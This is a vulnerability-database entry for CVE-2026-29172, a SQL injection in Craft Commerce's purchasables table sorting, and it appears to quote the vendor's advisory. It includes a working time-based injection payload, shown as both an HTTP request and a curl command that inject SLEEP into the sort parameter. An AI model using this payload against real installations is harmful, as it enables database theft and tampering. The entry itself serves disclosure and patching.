CVE-2026-29172

EPSS 0.01%

Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting

發布日:2026/3/10修改日:2026/3/13

描述

## Summary Craft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split by `|` and the first part (column name) is passed directly as an array key to `orderBy()` without whitelist validation. Yii2's query builder does **NOT** escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the `ORDER BY` clause. --- ## PoC ### Required Permissions - General - Access the control panel - Access Craft Commerce - Craft Commerce - Manage orders - Edit orders ### Steps to reproduce 1. Log in to the control panel 2. Navigate to **Commerce** > **Orders** > Create a new order 3. Click on "Add a line item" to show the purchasables table 4. Intercept the AJAX request and modify the `sort` parameter as follows: ```http GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc ``` 5. Observe the delay in the response, confirming the injection Alternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed): ```bash curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc' ``` ### Impact With this Blind SQLi, an attacker can: - **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)). - **Modify or destroy data** (drop tables, update records, alter schema).

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

參考連結(5)